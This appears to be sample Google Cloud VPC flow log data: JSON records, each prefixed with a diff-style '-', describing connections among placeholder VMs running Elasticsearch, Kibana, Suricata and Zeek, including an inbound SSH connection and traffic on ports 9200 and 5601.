-{"insertId":"bxuq05fhgmw9d","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":41818},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:13.478093057Z","packets_sent":"4","reporter":"DEST","rtt_msec":"1350","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw90","jsonPayload":{"bytes_sent":"4580","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"60","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw8w","jsonPayload":{"bytes_sent":"270437","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65322},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"668","reporter":"DEST","rtt_msec":"92","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw94","jsonPayload":{"bytes_sent":"19019","connection":{"dest_ip":"203.0.113.58","dest_port":65322,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"604","reporter":"SRC","rtt_msec":"92","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw8x","jsonPayload":{"bytes_sent":"16208","connection":{"dest_ip":"10.87.40.76","dest_port":33568,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"80","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw8v","jsonPayload":{"bytes_sent":"9800","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"120","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw8z","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58026},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"DEST","rtt_msec":"40","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw9b","jsonPayload":{"bytes_sent":"19506","connection":{"dest_ip":"10.87.40.76","dest_port":33564,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"180","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw8y","jsonPayload":{"bytes_sent":"1496","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":32882},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw9e","jsonPayload":{"bytes_sent":"155675","connection":{"dest_ip":"192.0.2.177","dest_port":60126,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"288","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw98","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"203.0.113.27","dest_port":32882,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw96","jsonPayload":{"bytes_sent":"28304484","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.212","src_port":39568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"2400","reporter":"DEST","rtt_msec":"15","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw99","jsonPayload":{"bytes_sent":"2962242","connection":{"dest_ip":"203.0.113.212","dest_port":39568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"1340","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw93","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58026,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"SRC","rtt_msec":"40","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw9f","jsonPayload":{"bytes_sent":"9611","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"101","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw9j","jsonPayload":{"bytes_sent":"318481","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"181","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw97","jsonPayload":{"bytes_sent":"139359","connection":{"dest_ip":"10.87.40.76","dest_port":33874,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"70","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw9i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60640},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw9c","jsonPayload":{"bytes_sent":"45","connection":{"dest_ip":"198.51.100.182","dest_port":41818,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:43:16.809366809Z","packets_sent":"9","reporter":"SRC","rtt_msec":"1350","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw9h","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":60640,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw92","jsonPayload":{"bytes_sent":"358920","connection":{"dest_ip":"10.87.40.76","dest_port":33966,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"61","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},
"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw8u","jsonPayload":{"bytes_sent":"653827","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53104},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"286","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw9g","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"81","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw91","jsonPayload":{"bytes_sent":"31140","connection":{"dest_ip":"10.87.40.76","dest_port":33524,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"40","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw95","jsonPayload":{"bytes_sent":"1610630","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"509","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw9a","jsonPayload":{"bytes_sent":"37145","connection":{"dest_ip":"198.51.100.88","dest_port":53104,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"158","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"198begsfh44xy3","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":53972},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxt","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58100},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:20.632737426Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:20.512264850Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58100,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:20.632777660Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:20.512407536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
